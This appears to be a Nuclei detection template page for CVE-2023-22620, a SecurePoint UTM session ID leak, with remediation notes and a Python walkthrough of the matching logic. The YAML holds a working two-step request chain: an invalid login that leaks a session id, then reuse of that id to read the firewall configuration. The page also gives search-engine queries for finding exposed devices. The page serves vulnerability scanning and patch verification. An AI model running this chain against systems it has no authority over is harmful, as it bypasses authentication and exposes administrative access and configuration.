SecurePoint UTM 12.x Session ID Leak
ID: CVE-2023-22620
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint
Description
An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall’s endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device’s authentication and get access to the administrative interface.
YAML Source
id: CVE-2023-22620

info:
  name: SecurePoint UTM 12.x Session ID Leak
  author: DhiyaneshDK
  severity: high
  description: |
    An issue was discovered in SecurePoint UTM before 12.2.5.1. The firewall's endpoint at /spcgi.cgi allows sessionid information disclosure via an invalid authentication attempt. This can afterwards be used to bypass the device's authentication and get access to the administrative interface.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or perform actions on behalf of the user.
  remediation: Upgrade to version 12.2.5.1 or newer
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22620
    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22620.txt
    - https://www.rcesecurity.com/2023/04/securepwn-part-1-bypassing-securepoint-utms-authentication-cve-2023-22620/
    - https://packetstormsecurity.com/files/171924/SecurePoint-UTM-12.x-Session-ID-Leak.html
    - https://rcesecurity.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-22620
    cwe-id: CWE-863
    epss-score: 0.03698
    epss-percentile: 0.91758
    cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: securepoint
    product: unified_threat_management
    shodan-query:
      - title:"Securepoint UTM"
      - http.title:"securepoint utm"
    fofa-query: title="securepoint utm"
    google-query: intitle:"securepoint utm"
  tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint

http:
  - raw:
      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

        {"module":"auth","command":["login"],"sessionid":"","arguments":{"user":"","pass":""}}

      - |
        POST /spcgi.cgi HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json; charset=UTF-8
        Accept-Encoding: gzip, deflate
        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

        {"module":"system","command":["config","get"],"sessionid":"{{session}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '"status":"OK"'

      - type: word
        part: header_2
        words:
          - 'application/json'

    extractors:
      - type: regex
        name: session
        group: 1
        regex:
          - '"sessionid": "([a-z0-9]+)"'
        internal: true
# digest: 4b0a00483046022100a0112c4fe1db0850b29c6a6c3d98375553df51e8dec25badb9f6a20ea31545be022100efa0edb5b5cb27ff825cc6e08c9f5dfdae9c33628e5837e911af8ff2155adc48:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the session ID leak described above. Run it with the Nuclei scanner against the target URL; the first request performs the invalid login, the extractor pulls the leaked sessionid into the internal variable session, and the second request only matches if that session is accepted for a config read.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22620.yaml"
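To show how the template's extractor and two matchers combine (and why a finding fires or stays silent), here is an added Python re-implementation of that logic over constructed sample responses. It is not part of the template or of Nuclei; the sample bodies, their field layout and the helper names are assumptions made for this illustration.

```python
import re

# Extractor regex and matcher words copied verbatim from the template's YAML.
# Note the space after the colon and the [a-z0-9]+ class: an upper-case or
# hyphenated session id format would NOT be extracted, so the second request
# would carry an empty sessionid and the template would report nothing.
SESSION_RE = re.compile(r'"sessionid": "([a-z0-9]+)"')
BODY_WORD = '"status":"OK"'        # matcher on body_2
HEADER_WORD = 'application/json'   # matcher on header_2


def extract_session(login_body: str):
    """Mirror the `regex` extractor (group 1, internal: true) applied to the
    response of the invalid-login request. Returns the id or None."""
    m = SESSION_RE.search(login_body)
    return m.group(1) if m else None


def split_response(raw: str):
    """Split a raw HTTP response into (headers, body), the parts the
    template addresses as header_2 and body_2 for the second request."""
    head, _, body = raw.partition("\r\n\r\n")
    return head, body


def template_matches(login_response: str, config_response: str) -> bool:
    """Evaluate `matchers-condition: and`: fires only if the first response
    leaked a session id AND the second (config get) response is JSON with
    status OK, i.e. the leaked id was accepted as an authenticated session."""
    if extract_session(login_response) is None:
        return False  # nothing to reuse; second request is meaningless
    headers, body = split_response(config_response)
    return BODY_WORD in body and HEADER_WORD in headers


# Constructed sample responses (not captured from a real device).
LEAKY_LOGIN = ('HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n'
               '{"status": "FAILED", "sessionid": "a1b2c3d4e5f6"}')
PATCHED_LOGIN = ('HTTP/1.1 200 OK\r\nContent-Type: application/json\r\n\r\n'
                 '{"status": "FAILED"}')
CONFIG_OK = ('HTTP/1.1 200 OK\r\nContent-Type: application/json; charset=UTF-8'
             '\r\n\r\n{"status":"OK","data":{}}')

if __name__ == "__main__":
    print(template_matches(LEAKY_LOGIN, CONFIG_OK))    # True
    print(template_matches(PATCHED_LOGIN, CONFIG_OK))  # False
```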